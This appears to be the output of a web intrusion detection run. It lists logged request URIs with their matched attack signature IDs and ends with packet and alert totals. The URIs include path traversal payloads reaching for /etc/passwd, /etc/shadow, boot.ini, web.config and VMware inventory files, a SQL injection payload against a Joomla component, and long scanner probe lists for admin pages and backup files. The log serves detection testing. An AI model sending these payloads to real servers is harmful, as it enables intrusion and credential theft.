Packet [830]	Uri [/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001145]
Packet [839]	Uri [/data.sql]	Nattacks [1]	Signatures	[300001526]
Packet [841]	Uri [/database.sql]	Nattacks [1]	Signatures	[300001526]
Packet [844]	Uri [/databases/acidcat_3.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [848]	Uri [/db.sql]	Nattacks [1]	Signatures	[300001526]
Packet [850]	Uri [/db/users.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [857]	Uri [/ddb.sql]	Nattacks [1]	Signatures	[300001526]
Packet [868]	Uri [/debug.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [939]	Uri [/dsp_page.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [940]	Uri [/dump.sql]	Nattacks [1]	Signatures	[300001526]
Packet [976]	Uri [/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [1028]	Uri [/flexfm/,/lib/usermanagement/userInfo.php,/security/xamppsecurity.php,/system/console,/dm-albums/dm-albums.php,/ibm/console/logon.jsp?action=OK,/console/,/console/portal/0/Welcome,/rest/applinks/1.0/manifest,/jira/rest/applinks/1.0/manifest,/secure/rest/applinks/1.0/manifest,/rest/servicedeskapi/info,/jira/rest/servicedeskapi/info,/secure/rest/servicedeskapi/info,/rest/applinks/1.0/manifest,/confluence/rest/applinks/1.0/manifest,/wiki/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/bitbucket/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/bamboo/rest/applinks/1.0/manifest,/rest/applinks/1.0/manifest,/crowd/rest/applinks/1.0/manifest,/x_logo.gif,/gif/hp.gif,/gif/hp_invent_logo.gif,/gif/printer.gif,/hp/device/this.LCDispatcher,/hp/device/webAccess/index.htm,/PageSelector.class,/images/lexbold.gif,/images/lexlogo.gif,/images/printer.gif,/printer/image,/images/mute_alloff.gif,/images/pic_bri.gif,/scanweb/images/scanwebtm.gif,/view/index.shtml,/phpmyadmin/,/phpMyAdmin/]	Nattacks [1]	Signatures	[300001516]
Packet [1090]	Uri [/happyaxis.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1098]	Uri [/help/../../etc/shadow]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1108]	Uri [/HNAP1/,/.htaccess,/.htpasswd,/_vti_bin/,/_vti_cnf/,/_vti_log/,/_vti_pvt/,/_vti_txt/,/postinfo.html,/_vti_bin/_vti_aut/author.dll,/_vti_bin/_vti_aut/author.exe,/_vti_bin/_vti_aut/dvwssr.dll,/_vti_bin/_vti_adm/admin.dll,/_vti_bin/_vti_adm/admin.exe,/_vti_bin/fpcount.exe?Page=default.asp|Image=3,/_vti_bin/shtml.dll,/_vti_bin/shtml.exe,/_vti_pvt/_x_todo.htm,/_vti_pvt/_x_todoh.htm]	Nattacks [4]	Signatures	[300001562]	[300001846]	[300001847]	[300001897]
Packet [1113]	Uri [/home.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1118]	Uri [/host-manager/html/]	Nattacks [1]	Signatures	[300001901]
Packet [1119]	Uri [/host-manager/text/]	Nattacks [1]	Signatures	[300001901]
Packet [1148]	Uri [/ibm/console/logon.jsp?action=OK]	Nattacks [1]	Signatures	[300001516]
Packet [1196]	Uri [/includes/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1198]	Uri [/includes/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1200]	Uri [/includes/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py]	Nattacks [1]	Signatures	[300001513]
Packet [1208]	Uri [/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)]	Nattacks [3]	Signatures	[300001024]	[300001025]	[300002838]
Packet [1230]	Uri [/intruvert/jsp/module/Login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1276]	Uri [/kbcat.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1335]	Uri [/log.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1349]	Uri [/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1352]	Uri [/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1363]	Uri [/logs.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1388]	Uri [/main_configure.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1409]	Uri [/mdb-database/dblog.mdb]	Nattacks [1]	Signatures	[300001526]
Packet [1417]	Uri [/memberadmin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1418]	Uri [/memberadmin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1436]	Uri [/modelsearch/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1438]	Uri [/modelsearch/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1442]	Uri [/modelsearch/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1444]	Uri [/modelsearch/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1449]	Uri [/modelsearch/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1451]	Uri [/modelsearch/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1455]	Uri [/moderator.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1457]	Uri [/moderator.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1462]	Uri [/moderator/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1464]	Uri [/moderator/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1469]	Uri [/moderator/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1471]	Uri [/moderator/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1495]	Uri [/mxportal/home/MxPortalFrames.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1503]	Uri [/mysql.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1510]	Uri [/nagios3/cgi-bin/statuswml.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1564]	Uri [/officescan/console/html/cgi/cgiChkMasterPwd.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1568]	Uri [/old.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1585]	Uri [/OvCgi/Toolbar.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1595]	Uri [/pages/admin/admin-login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1597]	Uri [/pages/admin/admin-login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1608]	Uri [/panel-administracion/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1610]	Uri [/panel-administracion/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1614]	Uri [/panel-administracion/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1616]	Uri [/panel-administracion/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1620]	Uri [/panel-administracion/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1622]	Uri [/panel-administracion/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1650]	Uri [/phpinfo.php]	Nattacks [1]	Signatures	[300001887]
Packet [1707]	Uri [/phpMyAdmin-2.8.0.2/,/phpMyAdmin-2.8.0.3/,/phpMyAdmin-2.8.0.4/,/phpMyAdmin-2.8.1-rc1/,/phpMyAdmin-2.8.1/,/phpMyAdmin-2.8.2/,/sqlmanager/,/php-myadmin/,/phpmy-admin/,/mysqladmin/,/mysql-admin/,/websql/,/_phpmyadmin/,/footer1.gif,/homepage.nsf/homePage.gif?OpenImageResource,/icons/ecblank.gif,/852566C90012664F,/admin4.nsf,/admin5.nsf,/admin.nsf,/agentrunner.nsf,/alog.nsf,/a_domlog.nsf,/bookmark.nsf,/busytime.nsf,/catalog.nsf,/certa.nsf,/certlog.nsf,/certsrv.nsf,/chatlog.nsf,/clbusy.nsf,/cldbdir.nsf,/clusta4.nsf,/collect4.nsf,/da.nsf,/dba4.nsf,/dclf.nsf,/DEASAppDesign.nsf,/DEASLog01.nsf,/DEASLog02.nsf,/DEASLog03.nsf,/DEASLog04.nsf]	Nattacks [1]	Signatures	[300001843]
Packet [1717]	Uri [/phpmyadmin/]	Nattacks [1]	Signatures	[300001843]
Packet [1744]	Uri [/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [1745]	Uri [/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00,/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234,/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20,/d41d8cd98f00b204e9800998ecf8427e.php,/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0,/rom-0,/Telerik.Web.UI.DialogHandler.aspx?dp=////,/Telerik.Web.UI.DialogHandler.ashx?dp=////,/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////,/uir//etc/passwd,/uir//tmp/csman/0,/cgi-bin/export_debug_msg.exp,/cgi-bin/config.exp,/,/readme.html,/,?feed=rss,?feed=rss2,?feed=atom,/feed,/feed/,/feed/rss,/feed/rss2,/feed/atom]	Nattacks [6]	Signatures	[300000053]	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1825]	Uri [/ReqWebHelp/advanced/workingSet.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1827]	Uri [/respaldo.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1830]	Uri [/restoreinfo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1843]	Uri [/root/,/rsrc/,/ruby/,/sales/,/save/,/script/,/ScriptLibrary/,/scripts/,/search/,/search-ui/,/sec/,/secret/,/secured/,/secure/,/security/,/sell/,/server/,/server-info/,/servers/,/server_stats/,/serverstats/,/server-status/,/service/,/services/,/servicio/,/servicios/,/servlet/,/servlets/,/session/,/setup/,/shared/,/sharedtemplates/,/share/,/shell-cgi/,/shipping/,/shop/,/shopper/,/show/,/SilverStream/,/siteadmin/,/site/,/sitemgr/,/siteminderagent/,/siteminder/]	Nattacks [1]	Signatures	[300001899]
Packet [1847]	Uri [/rss.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1869]	Uri [/scripts/WPnBr.dll]	Nattacks [1]	Signatures	[300001562]
Packet [1871]	Uri [/sd/workorder/FileDownload.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1873]	Uri [/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1874]	Uri [/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1875]	Uri [/sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1876]	Uri [/sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1890]	Uri [/server-status]	Nattacks [1]	Signatures	[300001899]
Packet [1891]	Uri [/server-status/]	Nattacks [1]	Signatures	[300001899]
Packet [1905]	Uri [/setup.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1925]	Uri [/siteadmin/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1926]	Uri [/siteadmin/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1930]	Uri [/siteadmin/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1932]	Uri [/siteadmin/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1971]	Uri [/smquar.nsf,/smsolar.nsf,/smtime.nsf,/smtpibwq.nsf,/smtpobwq.nsf,/smtp.box,/smtp.nsf,/smvlog.nsf,/srvnam.htm,/statmail.nsf,/statrep.nsf,/stauths.nsf,/stautht.nsf,/stconfig.nsf,/stconf.nsf,/stdnaset.nsf,/stdomino.nsf,/stlog.nsf,/streg.nsf,/stsrc.nsf,/userreg.nsf,/vpuserinfo.nsf,/webadmin.nsf,/web.nsf,/.nsf/../winnt/win.ini,/icons/ecblank.gif,/_api/version,/_layouts/images/helpicon.gif,/Pages/Default.aspx,/PublishingImages/NewsArticleImage.jpg,/_admin/operations.aspx,/_app_bin,/_controltemplates,/_layouts,/_layouts/viewlsts.aspx,/forms/allitems.aspx,/forms/webfldr.aspx,/forms/mod-view.aspx,/forms/my-sub.aspx,/pages/categoryresults.aspx,/categories/viewcategory.aspx,/sitedirectory]	Nattacks [1]	Signatures	[300000067]
Packet [2107]	Uri [/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [2117]	Uri [/tomcat/host-manager/html/]	Nattacks [1]	Signatures	[300001901]
Packet [2118]	Uri [/tomcat/host-manager/text/]	Nattacks [1]	Signatures	[300001901]
Packet [2125]	Uri [/tools_admin.cgi?]	Nattacks [1]	Signatures	[300001513]
Packet [2145]	Uri [/ts/in.cgi?open2]	Nattacks [1]	Signatures	[300001513]
Packet [2158]	Uri [/uir//etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [2176]	Uri [/upload_multiple_js.php,/uploadtester.asp,/info.php,/phpinfo.php,/kusabax/manage_page.php,/plus/lurking.php,/adm/barra/assetmanager/assetmanager.php,/eyeos/,/NETWARE.HTM,/setup.cgi,/debug.cgi,/ehcp/?op=applyforftpaccount,/ehcp/?op=applyforaccount,/ehcp/?op=applyfordomainaccount,/vhosts/ehcp/?op=applyforftpaccount,/vhosts/ehcp/?op=applyforaccount,/vhosts/ehcp/?op=applyfordomainaccount,/tools_admin.cgi?,/level/15,/exec/show/log/CR,/level/15/exec/-/configure/http,/level/15/exec/-,/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server,/console/login/loginForm.jsp,/login_img.jpg,/cirronetlogo.gif,/browserId/wizardForm.jhtml,/webline/html/forms/callback.jhtml,/webline/html/forms/callbackICM.jhtml,/webline/html/agent/AgentFrame.jhtml,/webline/html/agent/default/badlogin.jhtml,/callme/callForm.jhtml,/webline/html/multichatui/nowDefunctWindow.jhtml,/browserId/wizard.jhtml,/admin/CiscoAdmin.jhtml,/msccallme/mscCallForm.jhtml,/webline/html/admin/wcs/LoginPage.jhtml]	Nattacks [2]	Signatures	[300000053]	[300001887]
Packet [2181]	Uri [/user.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2183]	Uri [/user.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2188]	Uri [/users.sql]	Nattacks [1]	Signatures	[300001526]
Packet [2193]	Uri [/usuarios.sql]	Nattacks [1]	Signatures	[300001526]
Packet [2226]	Uri [/web-console/ServerInfo.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2235]	Uri [/webadmin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2237]	Uri [/webadmin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2244]	Uri [/webadmin/admin.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2246]	Uri [/webadmin/admin.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2250]	Uri [/webadmin/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2252]	Uri [/webadmin/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2256]	Uri [/webadmin/login.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [2258]	Uri [/webadmin/login.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2324]	Uri [/workorder/FileDownload.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [2328]	Uri [/wp-config.bak]	Nattacks [1]	Signatures	[300001927]
Packet [2329]	Uri [/wp-config.php.bak]	Nattacks [2]	Signatures	[300001512]	[300001927]
Packet [2330]	Uri [/wp-config.php~]	Nattacks [2]	Signatures	[300001500]	[300001512]
Packet [2460]	Uri [/wwwlog/,/wwwlogs/,/mail_log_files/,/images/rails.png,/mono/,/robots.txt,/crossdomain.xml,/css/cake.generic.css,/img/cake.icon.gif,/img/cake.icon.png,/js/vendors.php,/cgi-bin/ffileman.cgi?,/fshow.php,/admin/upload.php]	Nattacks [1]	Signatures	[300001513]
Packet [2483]	Uri [/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../dev/null%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [2484]	Uri [/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [2488]	Uri [/\../\../\../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [2512]	Uri [/_phpmyadmin/]	Nattacks [1]	Signatures	[300001843]
Packet [2517]	Uri [/_vti_bin/]	Nattacks [1]	Signatures	[300001897]
Packet [2518]	Uri [/_vti_bin/fpcount.exe?Page=default.asp|Image=3]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2519]	Uri [/_vti_bin/shtml.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2520]	Uri [/_vti_bin/shtml.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2521]	Uri [/_vti_bin/_vti_adm/admin.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2522]	Uri [/_vti_bin/_vti_adm/admin.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2523]	Uri [/_vti_bin/_vti_aut/author.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2524]	Uri [/_vti_bin/_vti_aut/author.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2525]	Uri [/_vti_bin/_vti_aut/dvwssr.dll]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [2530]	Uri [/_vti_pvt/access.cnf,/_vti_pvt/administrator.pwd,/_vti_pvt/administrators.pwd,/_vti_pvt/authors.pwd,/_vti_pvt/bots.cnf,/_vti_pvt/botinfs.cnf,/_vti_pvt/deptodoc.btr,/_vti_pvt/doctodep.btr,/_vti_pvt/frontpg.lck,/_vti_pvt/linkinfo.cnf,/_vti_pvt/service.cnf,/_vti_pvt/service.grp,/_vti_pvt/service.lck,/_vti_pvt/service.pwd,/_vti_pvt/Service.stp,/_vti_pvt/services.cnf,/_vti_pvt/services.org,/_vti_pvt/structure.cnf,/_vti_pvt/svcacl.cnf,/_vti_pvt/users.pwd,/_vti_pvt/uniqueperm.cnf,/_vti_pvt/writeto.cnf,/.svn/,/.svn/text-base/.htaccess.svn-base,/.svn/text-base/.htpasswd.svn-base,/.svn/text-base/Web.config.svn-base,/.git/HEAD,/.hg/requires,/.bzr/README,/downloadFile.php,/BackupConfig.php,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb,/Info.live.htm,/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config]	Nattacks [8]	Signatures	[300000053]	[300000057]	[300000067]	[300000071]	[300001145]	[300001506]	[300001846]	[300001847]
Packet [2578]	Uri [/~root]	Nattacks [1]	Signatures	[300001872]
Packet [2585]	Uri [index.html?../../../../../boot.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [2586]	Uri [index.html?..\..\..\..\..\boot.ini]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [2587]	Uri [\\..%2f..%2f..%2f..%2fboot.ini%]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300000067]
# N. packets [2587], [321] with alerts, N. Alerts [505]
# Execution time: 0.385943 s
